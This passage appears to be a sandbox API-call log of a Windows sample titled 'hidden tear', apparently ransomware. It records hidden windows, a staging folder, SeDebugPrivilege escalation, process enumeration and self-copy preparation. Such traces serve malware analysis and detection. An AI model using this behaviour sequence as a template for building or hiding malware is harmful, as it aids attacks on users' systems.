uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0034.329] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0034.329] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0034.329] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0034.329] EnableMenuItem (hMenu=0x230109, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0034.330] SetLayeredWindowAttributes (hwnd=0x401c2, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0034.331] GetCurrentThreadId () returned 0x974 [0034.332] EnumThreadWindows (dwThreadId=0x974, lpfn=0x5108d6, lParam=0x401c2) returned 1 [0034.350] GetWindowLongW (hWnd=0x6011c, nIndex=-8) returned 0 [0034.350] GetWindowLongW (hWnd=0x401c2, nIndex=-8) returned 0 [0034.350] GetWindowLongW (hWnd=0x4011e, nIndex=-8) returned 262594 [0034.377] SetWindowLongW (hWnd=0x4011e, nIndex=-8, dwNewLong=0) returned 262594 [0034.380] GetParent (hWnd=0x401c2) returned 0x0 [0034.380] GetWindowLongW (hWnd=0x401c2, nIndex=-20) returned 852352 [0034.380] DestroyWindow (hWnd=0x401c2) returned 1 [0034.380] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0034.380] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x46, wParam=0x0, lParam=0x3ae610) returned 0x0 [0034.382] GetWindowPlacement (in: hWnd=0x401c2, lpwndpl=0x3ae3c0 | out: lpwndpl=0x3ae3c0) returned 1 [0034.382] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x47, wParam=0x0, lParam=0x3ae610) returned 0x0 [0034.382] GetClientRect (in: hWnd=0x401c2, lpRect=0x3ae370 | out: lpRect=0x3ae370) returned 1 [0034.382] GetWindowRect (in: hWnd=0x401c2, lpRect=0x3ae370 | out: lpRect=0x3ae370) returned 1 [0034.383] GetWindowTextLengthW (hWnd=0x401c2) returned 11 [0034.383] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.383] GetSystemMetrics (nIndex=42) returned 0 [0034.383] GetWindowTextW (in: hWnd=0x401c2, lpString=0x3ae290, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.383] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0xd, wParam=0xc, lParam=0x3ae290) returned 0xb [0034.383] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0034.383] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x401c2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0034.385] GetCurrentActCtx (in: lphActCtx=0x3ae66c | out: lphActCtx=0x3ae66c*=0x416cac) returned 1 [0034.385] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0034.385] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0034.385] CreateWindowExW (dwExStyle=0x90080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="hidden tear", dwStyle=0x2cf0000, X=175, Y=175, nWidth=136, nHeight=57, hWndParent=0x0, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x301c4 [0034.385] SetWindowLongW (hWnd=0x301c4, nIndex=-4, dwNewLong=1997940189) returned 5310438 [0034.385] GetWindowLongW (hWnd=0x301c4, nIndex=-4) returned 1997940189 [0034.386] SetWindowLongW (hWnd=0x301c4, nIndex=-4, dwNewLong=5310718) returned 1997940189 [0034.386] GetWindowLongW (hWnd=0x301c4, nIndex=-4) returned 5310718 [0034.386] GetWindowLongW (hWnd=0x301c4, nIndex=-16) returned 114229248 [0034.386] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x81, wParam=0x0, lParam=0x3ae100) returned 0x1 [0034.386] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x83, wParam=0x0, lParam=0x3ae0ec) returned 0x0 [0034.387] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x1, wParam=0x0, lParam=0x3ae100) returned 0x0 [0034.387] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ade38 | out: lpRect=0x3ade38) returned 1 [0034.387] GetWindowRect (in: hWnd=0x301c4, lpRect=0x3ade38 | out: lpRect=0x3ade38) returned 1 [0034.387] SetWindowTextW (hWnd=0x301c4, lpString="hidden tear") returned 1 [0034.387] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xc, wParam=0x0, lParam=0x23bf01c) returned 0x1 [0034.387] SetLayeredWindowAttributes (hwnd=0x301c4, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0034.387] GetStartupInfoW (in: lpStartupInfo=0x23bf2f8 | out: lpStartupInfo=0x23bf2f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0034.388] GetParent (hWnd=0x301c4) returned 0x0 [0034.388] GetStockObject (i=5) returned 0x1900015 [0034.388] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0034.388] CoTaskMemAlloc (cb=0x5c) returned 0x4252f8 [0034.388] RegisterClassW (lpWndClass=0x3ae54c) returned 0xc13b [0034.388] CoTaskMemFree (pv=0x4252f8) [0034.388] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0034.388] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x301be [0034.389] SetWindowLongW (hWnd=0x301be, nIndex=-4, dwNewLong=1997940189) returned 5310758 [0034.389] GetWindowLongW (hWnd=0x301be, nIndex=-4) returned 1997940189 [0034.389] SetWindowLongW (hWnd=0x301be, nIndex=-4, dwNewLong=5310798) returned 1997940189 [0034.389] GetWindowLongW (hWnd=0x301be, nIndex=-4) returned 5310798 [0034.389] GetWindowLongW (hWnd=0x301be, nIndex=-16) returned 79691776 [0034.389] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x24, wParam=0x0, lParam=0x3ae134) returned 0x0 [0034.389] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x81, wParam=0x0, lParam=0x3ae128) returned 0x1 [0034.389] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x83, wParam=0x0, lParam=0x3ae114) returned 0x0 [0034.390] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x1, wParam=0x0, lParam=0x3ae128) returned 0x0 [0034.390] SetWindowLongW (hWnd=0x301c4, nIndex=-8, dwNewLong=197054) returned 0 [0034.390] SendMessageW (hWnd=0x301c4, Msg=0x80, wParam=0x0, lParam=0x901b7) returned 0x0 [0034.390] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x80, wParam=0x0, lParam=0x901b7) returned 0x0 [0034.390] SendMessageW (hWnd=0x301c4, Msg=0x80, wParam=0x1, lParam=0x3016f) returned 0x0 [0034.390] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x80, wParam=0x1, lParam=0x3016f) returned 0x0 [0034.391] GetSystemMenu (hWnd=0x301c4, bRevert=0) returned 0x240109 [0034.391] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae67c | out: lpwndpl=0x3ae67c) returned 1 [0034.391] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0034.391] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0034.391] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0034.391] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0034.391] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0034.391] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae6c0 | out: lpRect=0x3ae6c0) returned 1 [0034.391] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae620 | out: lpRect=0x3ae620) returned 1 [0034.391] GetWindowRect (in: hWnd=0x301c4, lpRect=0x3ae620 | out: lpRect=0x3ae620) returned 1 [0034.391] SetWindowPos (hWnd=0x301c4, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x57) returned 1 [0034.391] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x46, wParam=0x0, lParam=0x3ae588) returned 0x0 [0034.394] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0034.395] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae350 | out: lpwndpl=0x3ae350) returned 1 [0034.395] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae2fc | out: lpRect=0x3ae2fc) returned 1 [0034.395] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0034.395] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.395] GetSystemMetrics (nIndex=42) returned 0 [0034.395] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3ae1bc, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.395] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3ae1bc) returned 0xb [0034.395] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae204 | out: lpRect=0x3ae204) returned 1 [0034.404] GetSysColor (nIndex=10) returned 0xb4b4b4 [0034.404] GetSysColor (nIndex=2) returned 0xd1b499 [0034.404] GetSysColor (nIndex=9) returned 0x0 [0034.404] GetSysColor (nIndex=12) returned 0xababab [0034.404] GetSysColor (nIndex=15) returned 0xf0f0f0 [0034.404] GetSysColor (nIndex=20) returned 0xffffff [0034.404] GetSysColor (nIndex=16) returned 0xa0a0a0 [0034.404] GetSysColor (nIndex=15) returned 0xf0f0f0 [0034.404] GetSysColor (nIndex=16) returned 0xa0a0a0 [0034.404] GetSysColor (nIndex=21) returned 0x696969 [0034.404] GetSysColor (nIndex=22) returned 0xe3e3e3 [0034.404] GetSysColor (nIndex=20) returned 0xffffff [0034.404] GetSysColor (nIndex=18) returned 0x0 [0034.404] GetSysColor (nIndex=1) returned 0x0 [0034.405] GetSysColor (nIndex=27) returned 0xead1b9 [0034.405] GetSysColor (nIndex=28) returned 0xf2e4d7 [0034.405] GetSysColor (nIndex=17) returned 0x6d6d6d [0034.405] GetSysColor (nIndex=13) returned 0xff9933 [0034.405] GetSysColor (nIndex=14) returned 0xffffff [0034.405] GetSysColor (nIndex=26) returned 0xcc6600 [0034.405] GetSysColor (nIndex=11) returned 0xfcf7f4 [0034.405] GetSysColor (nIndex=3) returned 0xdbcdbf [0034.405] GetSysColor (nIndex=19) returned 0x544e43 [0034.405] GetSysColor (nIndex=24) returned 0xe1ffff [0034.405] GetSysColor (nIndex=23) returned 0x0 [0034.406] GetSysColor (nIndex=4) returned 0xf0f0f0 [0034.406] GetSysColor (nIndex=30) returned 0xf0f0f0 [0034.406] GetSysColor (nIndex=29) returned 0xff9933 [0034.406] GetSysColor (nIndex=7) returned 0x0 [0034.406] GetSysColor (nIndex=0) returned 0xc8c8c8 [0034.406] GetSysColor (nIndex=5) returned 0xffffff [0034.406] GetSysColor (nIndex=6) returned 0x646464 [0034.406] GetSysColor (nIndex=8) returned 0x0 [0034.409] GetSystemMetrics (nIndex=80) returned 1 [0034.414] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x510976, dwData=0x0) returned 1 [0034.414] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x3ade6c | out: lpmi=0x3ade6c) returned 1 [0034.415] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x401086f [0034.415] GetDeviceCaps (hdc=0x401086f, index=12) returned 32 [0034.415] GetDeviceCaps (hdc=0x401086f, index=14) returned 1 [0034.415] DeleteDC (hdc=0x401086f) returned 1 [0034.416] GetCurrentObject (hdc=0x4010840, type=0x1) returned 0x1b00017 [0034.416] GetCurrentObject (hdc=0x4010840, type=0x2) returned 0x1900010 [0034.416] GetCurrentObject (hdc=0x4010840, type=0x7) returned 0x5d0501da [0034.416] GetCurrentObject (hdc=0x4010840, type=0x6) returned 0x18a002e [0034.416] SaveDC (hdc=0x4010840) returned 1 [0034.416] GetNearestColor (hdc=0x4010840, color=0xf0f0f0) returned 0xf0f0f0 [0034.418] CreateSolidBrush (color=0xf0f0f0) returned 0x15100257 [0034.419] FillRect (hDC=0x4010840, lprc=0x3ae0a4, hbr=0x15100257) returned 1 [0034.420] DeleteObject (ho=0x15100257) returned 1 [0034.421] RestoreDC (hdc=0x4010840, nSavedDC=-1) returned 1 [0034.422] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae338 | out: lpwndpl=0x3ae338) returned 1 [0034.422] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x47, wParam=0x0, lParam=0x3ae588) returned 0x0 [0034.422] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae2e8 | out: lpRect=0x3ae2e8) returned 1 [0034.422] GetWindowRect (in: hWnd=0x301c4, lpRect=0x3ae2e8 | out: lpRect=0x3ae2e8) returned 1 [0034.423] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x83, wParam=0x1, lParam=0x3ae16c) returned 0x0 [0034.425] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0034.426] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3adf5c | out: lpwndpl=0x3adf5c) returned 1 [0034.426] GetClientRect (in: hWnd=0x301c4, lpRect=0x3adf08 | out: lpRect=0x3adf08) returned 1 [0034.426] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0034.426] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.426] GetSystemMetrics (nIndex=42) returned 0 [0034.426] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3addc8, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.426] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3addc8) returned 0xb [0034.426] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ade10 | out: lpRect=0x3ade10) returned 1 [0034.426] GetCurrentObject (hdc=0x1501025e, type=0x1) returned 0x1b00017 [0034.426] GetCurrentObject (hdc=0x1501025e, type=0x2) returned 0x1900010 [0034.426] GetCurrentObject (hdc=0x1501025e, type=0x7) returned 0x5d0501da [0034.426] GetCurrentObject (hdc=0x1501025e, type=0x6) returned 0x18a002e [0034.426] SaveDC (hdc=0x1501025e) returned 1 [0034.427] GetNearestColor (hdc=0x1501025e, color=0xf0f0f0) returned 0xf0f0f0 [0034.427] CreateSolidBrush (color=0xf0f0f0) returned 0x16100257 [0034.427] FillRect (hDC=0x1501025e, lprc=0x3adcb0, hbr=0x16100257) returned 1 [0034.427] DeleteObject (ho=0x16100257) returned 1 [0034.427] RestoreDC (hdc=0x1501025e, nSavedDC=-1) returned 1 [0034.427] SetWindowLongW (hWnd=0x301c4, nIndex=-8, dwNewLong=197054) returned 197054 [0034.427] SendMessageW (hWnd=0x301be, Msg=0x80, wParam=0x1, lParam=0x3016f) returned 0x0 [0034.427] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0x80, wParam=0x1, lParam=0x3016f) returned 0x0 [0034.428] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0xd, wParam=0x104, lParam=0x490c610) returned 0x0 [0034.428] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301be, Msg=0xd, wParam=0x104, lParam=0x490c610) returned 0x0 [0034.429] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0034.429] GetWindowLongW (hWnd=0x301c4, nIndex=-16) returned 382664704 [0034.429] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0034.429] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.429] GetSystemMetrics (nIndex=42) returned 0 [0034.429] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3ae598, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.429] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3ae598) returned 0xb [0034.429] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0034.429] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.429] GetSystemMetrics (nIndex=42) returned 0 [0034.429] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3ae598, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.429] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3ae598) returned 0xb [0034.429] GetWindowLongW (hWnd=0x301c4, nIndex=-16) returned 382664704 [0034.429] GetWindowLongW (hWnd=0x301c4, nIndex=-20) returned 590208 [0034.429] SetWindowLongW (hWnd=0x301c4, nIndex=-16, dwNewLong=315555840) returned 382664704 [0034.429] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x7c, wParam=0xfffffff0, lParam=0x3ae614) returned 0x0 [0034.429] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x7d, wParam=0xfffffff0, lParam=0x3ae614) returned 0x0 [0034.430] SetWindowLongW (hWnd=0x301c4, nIndex=-20, dwNewLong=589952) returned 590208 [0034.430] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x7c, wParam=0xffffffec, lParam=0x3ae614) returned 0x0 [0034.430] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x7d, wParam=0xffffffec, lParam=0x3ae614) returned 0x0 [0034.430] SetWindowPos (hWnd=0x301c4, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0034.430] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x46, wParam=0x0, lParam=0x3ae634) returned 0x0 [0034.430] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x83, wParam=0x1, lParam=0x3ae60c) returned 0x0 [0034.432] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0034.434] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae3fc | out: lpwndpl=0x3ae3fc) returned 1 [0034.434] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae3a8 | out: lpRect=0x3ae3a8) returned 1 [0034.434] GetWindowTextLengthW (hWnd=0x301c4) returned 11 [0034.434] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0034.434] GetSystemMetrics (nIndex=42) returned 0 [0034.434] GetWindowTextW (in: hWnd=0x301c4, lpString=0x3ae268, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0034.434] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0xd, wParam=0xc, lParam=0x3ae268) returned 0xb [0034.434] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae2b0 | out: lpRect=0x3ae2b0) returned 1 [0034.434] GetCurrentObject (hdc=0x101084f, type=0x1) returned 0x1b00017 [0034.434] GetCurrentObject (hdc=0x101084f, type=0x2) returned 0x1900010 [0034.434] GetCurrentObject (hdc=0x101084f, type=0x7) returned 0x5d0501da [0034.434] GetCurrentObject (hdc=0x101084f, type=0x6) returned 0x18a002e [0034.434] SaveDC (hdc=0x101084f) returned 1 [0034.434] GetNearestColor (hdc=0x101084f, color=0xf0f0f0) returned 0xf0f0f0 [0034.434] CreateSolidBrush (color=0xf0f0f0) returned 0x17100257 [0034.434] FillRect (hDC=0x101084f, lprc=0x3ae150, hbr=0x17100257) returned 1 [0034.434] DeleteObject (ho=0x17100257) returned 1 [0034.434] RestoreDC (hdc=0x101084f, nSavedDC=-1) returned 1 [0034.434] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae3e4 | out: lpwndpl=0x3ae3e4) returned 1 [0034.434] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x301c4, Msg=0x47, wParam=0x0, lParam=0x3ae634) returned 0x0 [0034.435] GetClientRect (in: hWnd=0x301c4, lpRect=0x3ae394 | out: lpRect=0x3ae394) returned 1 [0034.435] GetWindowRect (in: hWnd=0x301c4, lpRect=0x3ae394 | out: lpRect=0x3ae394) returned 1 [0034.435] RedrawWindow (hWnd=0x301c4, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0034.435] GetSystemMenu (hWnd=0x301c4, bRevert=0) returned 0x240109 [0034.435] GetWindowPlacement (in: hWnd=0x301c4, lpwndpl=0x3ae66c | out: lpwndpl=0x3ae66c) returned 1 [0034.435] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0034.435] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0034.435] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0034.435] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0034.435] EnableMenuItem (hMenu=0x240109, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0034.435] SetWindowLongW (hWnd=0x4011e, nIndex=-8, dwNewLong=197060) returned 393500 [0034.458] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems", nBufferLength=0x105, lpBuffer=0x3ae20c, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Systems", lpFilePart=0x0) returned 0x1f [0034.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae668) returned 1 [0034.458] GetFileAttributesExW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems" (normalized: "c:\\5p5nrgjn0js halpmcxz\\systems"), fInfoLevelId=0x0, lpFileInformation=0x3ae6e4 | out: lpFileInformation=0x3ae6e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0034.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae664) returned 1 [0034.458] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems", nBufferLength=0x105, lpBuffer=0x3ae214, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Systems", lpFilePart=0x0) returned 0x1f [0034.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5fc) returned 1 [0034.459] GetFileAttributesExW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems" (normalized: "c:\\5p5nrgjn0js halpmcxz\\systems"), fInfoLevelId=0x0, lpFileInformation=0x3ae678 | out: lpFileInformation=0x3ae678*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0034.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5f8) returned 1 [0034.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5fc) returned 1 [0034.459] GetFileAttributesExW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems" (normalized: "c:\\5p5nrgjn0js halpmcxz\\systems"), fInfoLevelId=0x0, lpFileInformation=0x3ae678 | out: lpFileInformation=0x3ae678*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0034.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5f8) returned 1 [0034.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5fc) returned 1 [0034.460] GetFileAttributesExW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x3ae678 | out: lpFileInformation=0x3ae678*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0034.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5f8) returned 1 [0034.460] CreateDirectoryW (lpPathName="C:\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\5p5nrgjn0js halpmcxz"), lpSecurityAttributes=0x0) returned 1 [0034.461] CreateDirectoryW (lpPathName="C:\\5p5NrGJn0jS HALPmcxz\\Systems" (normalized: "c:\\5p5nrgjn0js halpmcxz\\systems"), lpSecurityAttributes=0x0) returned 1 [0034.464] GetCurrentProcessId () returned 0x970 [0034.467] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x3adffc | out: lpLuid=0x3adffc*(LowPart=0x14, HighPart=0)) returned 1 [0034.468] GetCurrentProcess () returned 0xffffffff [0034.468] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x3adff8 | out: TokenHandle=0x3adff8*=0x230) returned 1 [0034.468] AdjustTokenPrivileges (in: TokenHandle=0x230, DisableAllPrivileges=0, NewState=0x23c0c88*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0034.469] CloseHandle (hObject=0x230) returned 1 [0034.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x33c1a30, Length=0x20000, ResultLength=0x3ae6d8 | out: SystemInformation=0x33c1a30, ResultLength=0x3ae6d8*=0x9790) returned 0x0 [0034.494] CoTaskMemAlloc (cb=0x20e) returned 0x43d4d0 [0034.494] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x43d4d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0034.494] CoTaskMemFree (pv=0x43d4d0) [0034.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", nBufferLength=0x105, lpBuffer=0x3ae220, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", lpFilePart=0x0) returned 0x2f [0034.494] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Systems\\local.exe", nBufferLength=0x105, lpBuffer=0x3ae220, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Systems\\local.exe", lpFilePart=0x0) returned 0x29 [0034.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae680) returned 1 [0034.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe"), fInfoLevelId=0x0, lpFileInformation=0x3ae6fc | out: 